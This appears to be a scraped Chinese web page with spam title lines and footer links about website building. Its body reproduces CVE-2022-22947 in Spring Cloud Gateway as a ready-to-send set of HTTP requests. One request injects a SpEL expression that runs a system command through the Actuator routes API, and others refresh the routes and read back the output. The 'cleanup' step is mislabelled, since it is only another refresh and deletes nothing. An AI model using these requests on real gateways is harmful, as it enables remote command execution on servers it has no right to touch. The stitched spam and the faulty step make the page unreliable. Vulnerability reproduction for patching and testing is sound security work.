当前位置: 首页 > news >正文

服务器上面建设网站网站建设的实验总结

服务器上面建设网站,网站建设的实验总结,wordpress wdcp 伪静态,网站设计说明Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 参考链接: https://tanzu.vmware.c…

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

参考链接:

https://tanzu.vmware.com/security/cve-2022-22947
https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans

1.首先,发送如下数据包即可添加一个包含恶意SpEL表达式的路由:

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329{"id": "hacktest","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}}],"uri": "http://example.com"
}

然后,发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.188.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

最后,发送如下数据包清理现场,删除所添加的路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

http://www.yayakq.cn/news/180179/

相关文章:

  • 莱阳有网站建设推广的吗wordpress 百度cdn
  • 中国e网网站建设深圳市宝安区住房和建设局官网
  • wordpress站点被删北京网站建设方案外包
  • 哪些网站可以做招生wordpress登录密码错误
  • 开了360网站卫士ssl如何做301兰州网站建设优化推广
  • 便宜做外贸网站互联网公司花名大全男
  • 山东网站营销seo哪家好ASP网站开发教程实验总结
  • 山东省菏泽市城乡建设局网站深圳网络营销推广中心
  • 网站上的百度地图标注咋样做网站关键词排名优化价格
  • 丹徒网站建设报价58同城成都网站建设名录
  • 可以做网站二维码吗网站建设教育
  • 查看网站外链代码网上商城购物系统
  • 手机站点cn个人可以做电商网站吗
  • 开启WordPress多站点功能搭设企业网站教程
  • 做现货黄金网站广东专业网站建设
  • 网站建设开场介绍话术什么网站可以找手工活做
  • 专业的营销型网站公司莆田市城厢区建设局网站
  • 如何做输入密码进入网站手机网站欢迎页面
  • 有哪些网站做返利模式攀枝花网站推广
  • 重庆做商城网站关键词如何确定
  • 阆中 网站建设太仓住房与城乡建设局网站
  • 学做网站看什么淘宝客的wordpress模板
  • 学校网站建设分工记账代理公司注册
  • 电商商城网站开发python网站开发用什么软件
  • 电子商务网站建设规划报告书广州网页设计价格
  • 哈尔滨网站制作公司如何建设网站兴田德润实惠
  • 苏州网站建设logo百度app
  • 做薆视频网站网站制作思路
  • html设计素材网站扁平化设计网站代码
  • wordpress七牛云aso优化师工作很赚钱吗